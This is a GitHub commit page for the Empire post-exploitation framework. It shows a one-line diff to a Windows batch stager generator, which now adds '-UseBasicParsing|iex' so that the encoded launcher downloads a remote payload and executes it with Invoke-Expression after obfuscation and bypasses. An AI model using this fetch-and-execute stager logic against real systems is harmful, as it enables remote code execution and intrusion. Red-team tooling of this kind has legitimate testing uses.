Skip to content

Commit

Permalink
Added -UseBasicParsing to iwr (#359)
Browse files Browse the repository at this point in the history
  • Loading branch information
X0RW3LL authored May 19, 2022
1 parent 03a52f3 commit 55aaaec
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion empire/server/stagers/windows/launcher_bat.py
Original file line number Diff line number Diff line change
Expand Up @@ -103,7 +103,7 @@ def generate(self):
launcher_end = base64.b64encode(
(launcher_obfuscate_command + launcher_bypasses).encode("UTF-8")
).decode("UTF-8")
launcher_end += "')|iex\""
launcher_end += "') -UseBasicParsing|iex\""

launcher = launcher + launcher_end

Expand Down

0 comments on commit 55aaaec

Please sign in to comment.